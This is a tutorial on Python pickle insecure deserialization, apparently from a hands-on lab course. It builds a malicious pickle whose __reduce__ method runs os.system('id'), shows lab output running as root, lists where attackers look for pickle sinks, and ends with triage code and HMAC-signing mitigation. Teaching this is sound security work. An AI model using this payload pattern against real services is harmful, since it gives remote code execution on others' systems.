Insecure Deserialization - Python Pickle
pickle is a built-in Python module that provides functionality for serializing and deserializing Python objects.
As explained before, serialization, or pickling, is the process of converting a Python object into a byte stream, which can then be saved to a file or transmitted over a network.
Conversely, deserialization, or unpickling, reconstructs the original Python object from the byte stream.
In this example, we will demonstrate how to serialize a Python object using the pickle module and then encode the resulting byte stream into a Base64 string:
import base64
import pickle

class PyFuUser:
    def __init__(self, name):
        self.name = name

    def say_hello(self):
        message = f"Hello, {self.name}!"
        return message

pyfu_user = PyFuUser("Askar")
raw_pickled_data = pickle.dumps(pyfu_user)
print(f"Raw Pickled Data :\n{raw_pickled_data}")
print("=" * 30)
base64_pickled_data = base64.b64encode(raw_pickled_data).decode()
print(f"Base64 Pickled Data :\n{base64_pickled_data}")
Here, we used pickle.dumps to serialize an instance of the PyFuUser class into a raw byte stream, which is stored in the raw_pickled_data variable.
To make the byte stream easy to transfer, we then encoded it as a Base64 string.
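The reverse direction is not shown above, so here is a minimal sketch of it, assuming the receiver has the same PyFuUser class definition available: the Base64 string is decoded back to raw bytes and passed to pickle.loads. The variable names encoded and restored are illustrative only.

```python
import base64
import pickle


class PyFuUser:
    def __init__(self, name):
        self.name = name

    def say_hello(self):
        return f"Hello, {self.name}!"


# Sender side: serialize the object, then Base64-encode it for transport.
encoded = base64.b64encode(pickle.dumps(PyFuUser("Askar"))).decode()

# Receiver side: Base64-decode, then unpickle.
# This is only acceptable here because we produced the bytes ourselves.
restored = pickle.loads(base64.b64decode(encoded))
print(restored.say_hello())
```

Base64 changes only the transport encoding. The decoded bytes are an ordinary pickle and carry the same risks as any other pickle.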
In addition to converting Python objects into byte streams in memory, the pickle module allows you to serialize and persist objects to files.
This is useful for storing application state, caching, or saving complex data structures between executions.
The following example shows how to serialize an object and save it to a file:
import pickle

class PyFuUser:
    def __init__(self, name):
        self.name = name

    def say_hello(self):
        message = f"Hello, {self.name}!"
        return message

pyfu_user = PyFuUser("Askar")
with open("pickled_user.pickle", "wb") as f:
    pickle.dump(pyfu_user, f)
Here, pickle.dump() serializes the PyFuUser object and writes the resulting byte stream to the file pickled_user.pickle.
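To deserialize and load the object from the file, we can use the following code. The PyFuUser class is defined again because the pickle stores only a reference to the class, not its code, so the class must be available in the loading script: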
import pickle

class PyFuUser:
    def __init__(self, name):
        self.name = name

    def say_hello(self):
        message = f"Hello, {self.name}!"
        return message

with open("pickled_user.pickle", "rb") as f:
    loaded_user = pickle.load(f)
print(loaded_user.say_hello())
This reads the serialized data, reconstructs the original object, and calls its method as expected.
Create a Malicious Pickle
Python’s pickle module is inherently insecure when handling untrusted input.
One of the reasons is the __reduce__() method, which allows developers to define how an object should be serialized and deserialized.
Attackers can abuse this to inject arbitrary code execution into the deserialization process.
Here’s a basic example of creating a malicious pickle that executes a system command:
import pickle

class MaliciousPickle:
    def __reduce__(self):
        import os
        return (os.system, ("id", ))

payload = MaliciousPickle()
with open("pickled_user.pickle", "wb") as f:
    pickle.dump(payload, f)
In this example, the __reduce__() method returns a tuple that instructs pickle to call os.system("id") during deserialization. When a target application later calls pickle.load() on this file, the command executes immediately.
This demonstrates why deserializing data from untrusted sources is dangerous and why pickle should never be used with user-controlled input.
A key detail in exploiting Python’s pickle module is that the target application does not need to import the modules used in the malicious payload.
The tuple returned by __reduce__() is written into the pickle stream as a reference to the callable (its module and name) together with its arguments. The unpickler imports that module itself while reconstructing the object, so the attacker decides exactly which function is invoked and with what arguments.
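To see how the callable is named inside the stream, the payload can be disassembled instead of loaded. The sketch below uses the standard pickletools.dis function, which only decodes opcodes and does not call anything the pickle references. The variable names payload and listing are illustrative.

```python
import io
import os
import pickle
import pickletools


class MaliciousPickle:
    def __reduce__(self):
        return (os.system, ("id",))


# Serializing does not run the command; it only records what to call later.
payload = pickle.dumps(MaliciousPickle())

# Disassemble the stream into a text listing without executing it.
listing = io.StringIO()
pickletools.dis(payload, out=listing)
print(listing.getvalue())
```

The listing should show the module and function name stored as plain strings, followed by a REDUCE opcode that performs the call at load time. On Linux the module typically appears as posix rather than os, because that is where os.system is actually defined.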
Running it in the lab
docker compose run --rm generic-py-fu sh -c "python3 pickling-file-exploit.py; python3 unpickling-file.py"
uid=0(root) gid=0(root) groups=0(root)
The malicious class defines __reduce__ to return (os.system, ("id",)). pickle.load executes that while reconstructing the object, so the command runs before any of the program’s own code touches the data.
Why pickle deserialization matters from an offensive security perspective
I value a reachable pickle.loads more than almost any other Python sink because it is direct, unconditional remote code execution. There is no gadget chain to assemble, no filter to evade, no second-stage primitive to find: __reduce__ lets my payload name the callable and its arguments, and the loader runs it while reconstructing the object. The target never imports os and never writes a line that touches my data; the command fires before the program logic resumes.
What an attacker prizes is how invisible the sink is. Pickle hides inside everything that needs to move a Python object, so the vulnerable call is rarely a literal pickle.loads in the route handler. It rides along under caching layers, task queues, session cookies, and inter-service messaging, and the developer who chose those libraries often has no idea pickle is underneath.
Where I look for a reachable sink in an assessment:
- Session and auth cookies that decode to pickle, the cleanest path from unauthenticated request to RCE (see Authentication Bypass via Unsafe Python Deserialization).
- Cache backends such as Django/Flask cache layers and memcached/diskcache clients configured with a pickle serializer.
- Task queues like Celery, RQ, and Dramatiq, where workers unpickle message bodies, either by default or when a pickle serializer is configured.
- shelve files and .pkl model artifacts loaded from shared or user-writable storage (see Insecure Deserialization - Python Shelve).
- Any pickle.load over the network, including custom RPC and “load saved state” features.
The audit tell is any decode of attacker-influenced bytes that resolves to pickle, whether the call is explicit or buried in a serializer setting. For defenders the takeaway is to treat every reachable pickle.loads on untrusted input as already-achieved code execution.
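During an assessment, one way to check whether an opaque blob (for example a Base64-decoded cookie) is a pickle is to parse its opcodes statically rather than load it. The following is a rough triage sketch built on pickletools.genops. The function name triage_blob and the RISKY_OPCODES set are hypothetical helpers, not part of any library, and the result is an aid for the auditor, not a safety filter.

```python
import os
import pickle
import pickletools

# Opcodes that reference a callable or invoke one during loading (illustrative set).
RISKY_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE", "INST",
    "OBJ", "NEWOBJ", "NEWOBJ_EX", "BUILD",
}


def triage_blob(blob: bytes) -> dict:
    """Statically check whether blob parses as a pickle, without loading it."""
    seen = []
    try:
        # genops only decodes opcodes; it never executes the stream.
        for opcode, _arg, _pos in pickletools.genops(blob):
            seen.append(opcode.name)
    except Exception:
        return {"is_pickle": False, "risky_opcodes": []}
    is_pickle = bool(seen) and seen[-1] == "STOP"
    return {"is_pickle": is_pickle, "risky_opcodes": sorted(set(seen) & RISKY_OPCODES)}


class Probe:
    def __reduce__(self):
        return (os.system, ("id",))


benign = triage_blob(pickle.dumps({"user": "guest"}))
hostile = triage_blob(pickle.dumps(Probe()))
garbage = triage_blob(b"not a pickle")
print(benign, hostile, garbage, sep="\n")
```

A blob that parses cleanly tells you the application is probably feeding it to pickle somewhere. The presence or absence of risky opcodes in a captured sample says nothing about what the server will accept from you.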
Mitigation
The fix is to never unpickle data that crossed a trust boundary, because pickle.loads is by design a code-execution primitive and cannot be made robustly safe by inspection or a restricted unpickler. Use a data-only format such as JSON for untrusted input, and where Python objects genuinely must be exchanged, sign the serialized bytes with a secret-keyed MAC and verify that signature before deserializing so only data your own service produced is ever loaded. Treat any reachable pickle.loads on untrusted input as remote code execution.
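A minimal sketch of the sign-then-verify approach described above, using the standard hmac and hashlib modules. SECRET_KEY, sign_pickle, and load_signed_pickle are hypothetical names chosen for illustration, and the hard-coded key is a placeholder: a real service would load a random secret from its configuration or secret store.

```python
import hashlib
import hmac
import pickle

SECRET_KEY = b"replace-with-a-random-secret"  # placeholder, assumed for the example
MAC_SIZE = hashlib.sha256().digest_size  # 32 bytes for HMAC-SHA256


def sign_pickle(obj) -> bytes:
    """Pickle obj and prepend an HMAC-SHA256 tag over the pickled bytes."""
    data = pickle.dumps(obj)
    tag = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    return tag + data


def load_signed_pickle(blob: bytes):
    """Verify the tag first; unpickle only if it matches."""
    tag, data = blob[:MAC_SIZE], blob[MAC_SIZE:]
    expected = hmac.new(SECRET_KEY, data, hashlib.sha256).digest()
    # compare_digest avoids leaking the match position through timing.
    if not hmac.compare_digest(tag, expected):
        raise ValueError("signature mismatch; refusing to unpickle")
    return pickle.loads(data)


blob = sign_pickle({"name": "Askar"})
print(load_signed_pickle(blob))

# Flipping a single bit invalidates the tag, so pickle.loads is never reached.
tampered = blob[:-1] + bytes([blob[-1] ^ 1])
try:
    load_signed_pickle(tampered)
except ValueError as exc:
    print(f"rejected: {exc}")
```

The important property is the ordering: verification happens before pickle.loads ever sees the bytes. This protects only as long as the key stays secret, so anyone who obtains the key regains code execution.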